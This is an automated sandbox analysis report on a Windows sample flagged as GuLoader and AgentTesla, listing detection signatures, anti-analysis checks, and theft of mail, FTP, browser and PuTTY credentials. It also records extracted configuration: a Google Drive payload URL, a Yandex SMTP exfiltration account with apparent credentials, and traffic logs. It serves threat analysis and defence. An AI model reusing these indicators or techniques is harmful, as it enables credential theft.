Windows Analysis Report pago12_14299038859.exe

Overview

General Information

Sample Name: pago12_14299038859.exe
Analysis ID: 539535
MD5: 9a1518ed709f916360e56b5ac7d76995
SHA1: 7c85312d66edf5b02ebd6c25cfe9c036a3471263
SHA256: 2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to register a low level keyboard hook
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0000000B.00000000.12525032302.0000000001300000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}
Source: conhost.exe.400.12.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "bin2laden@yandex.combombom222smtp.yandex.com"}
Multi AV Scanner detection for submitted file
Source: pago12_14299038859.exe ReversingLabs: Detection: 15%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A12C6C CryptUnprotectData, 11_2_01A12C6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A133C0 CryptUnprotectData, 11_2_01A133C0

Compliance:

barindex
Uses 32bit PE files
Source: pago12_14299038859.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49798 version: TLS 1.2

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 77.88.21.158 77.88.21.158
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hned2vkl7hruln90p34il302vgb/1639487400000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49803 -> 77.88.21.158:587
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49803 -> 77.88.21.158:587
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmp String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: CasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080004153.000000001E4A8000.00000004.00000001.sdmp String found in binary or memory: http://MXR45a7j4Fjsxd.org
Source: CasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmp String found in binary or memory: http://MXR45a7j4Fjsxd.orgt-
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://crl.certum.pl/ca.crl0h
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
Source: CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp String found in binary or memory: http://repository.cer
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ca.cer09
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://repository.certum.pl/ycasha2.cer0
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp String found in binary or memory: http://smtp.yandex.com
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com0.
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp String found in binary or memory: http://uYFyNj.com
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: http://yandex.ocsp-responder.com03
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%4
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068150590.00000000016C8000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/
Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/a
Source: CasPol.exe, 0000000B.00000003.12729812870.00000000016E6000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068150590.00000000016C8000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hne
Source: CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmp String found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/tography
Source: CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/g(
Source: CasPol.exe, 0000000B.00000002.17067974975.00000000016AB000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
Source: CasPol.exe, 0000000B.00000003.12729812870.00000000016E6000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB2E7rmT0-hM4sya-aE
Source: CasPol.exe, 0000000B.00000002.17078787168.000000001E3B3000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 0000000B.00000002.17078787168.000000001E3B3000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hned2vkl7hruln90p34il302vgb/1639487400000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49798 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Contains functionality to register a low level keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A1D7C0 SetWindowsHookExW 0000000D,00000000,?,? 11_2_01A1D7C0
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
Uses 32bit PE files
Source: pago12_14299038859.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF02AD 1_2_02AF02AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_012092D8 11_2_012092D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01203E38 11_2_01203E38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01244508 11_2_01244508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_0124E9B0 11_2_0124E9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01243C38 11_2_01243C38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_012438F0 11_2_012438F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_015F78D0 11_2_015F78D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_015FCC8F 11_2_015FCC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_015FB170 11_2_015FB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_015F9D10 11_2_015F9D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_015F366E 11_2_015F366E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_019CB148 11_2_019CB148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_019C67C0 11_2_019C67C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_019C4B08 11_2_019C4B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_019C2740 11_2_019C2740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_019C2B78 11_2_019C2B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_019C0040 11_2_019C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A14880 11_2_01A14880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A15B78 11_2_01A15B78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A18298 11_2_01A18298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A1AA50 11_2_01A1AA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A1CD88 11_2_01A1CD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A10438 11_2_01A10438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A10448 11_2_01A10448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_01A13FF8 11_2_01A13FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1E1D5D08 11_2_1E1D5D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1E1D4394 11_2_1E1D4394
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_1E1D69F1 11_2_1E1D69F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_019C8370 11_2_019C8370
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 01248BA8 appears 52 times
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: pago12_14299038859.exe, 00000001.00000000.12022630539.000000000042B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFort.exe vs pago12_14299038859.exe
Source: pago12_14299038859.exe, 00000001.00000002.12762339982.00000000029E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameFort.exeFE2X vs pago12_14299038859.exe
Source: pago12_14299038859.exe Binary or memory string: OriginalFilenameFort.exe vs pago12_14299038859.exe
PE file contains strange resources
Source: pago12_14299038859.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\pago12_14299038859.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: pago12_14299038859.exe ReversingLabs: Detection: 15%
Source: pago12_14299038859.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pago12_14299038859.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\pago12_14299038859.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\pago12_14299038859.exe "C:\Users\user\Desktop\pago12_14299038859.exe"
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago12_14299038859.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pago12_14299038859.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago12_14299038859.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago12_14299038859.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\pago12_14299038859.exe File created: C:\Users\user\AppData\Local\Temp\~DFBA7BE0F4B3918979.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 0000000B.00000000.12525032302.0000000001300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.12762384265.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_00406471 push edi; iretd 1_2_00406472
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_00409011 push esp; retf 1_2_00409013
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_0040682F push esi; retf 1_2_00406830
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_0040A490 push ds; iretd 1_2_0040A491
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_004079F6 push eax; retf 1_2_00407A10
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_004055BF push ds; ret 1_2_004055D9
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_00405ECC push ebp; ret 1_2_00405ED8
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_00407F27 push edi; ret 1_2_00407F28
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_00407FBA push eax; iretd 1_2_00407FBB
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF0EAD push ebx; retf 1_2_02AF0EB0
Source: C:\Users\user\Desktop\pago12_14299038859.exe Code function: 1_2_02AF40BE push ecx; retf 1_2_02AF40C8
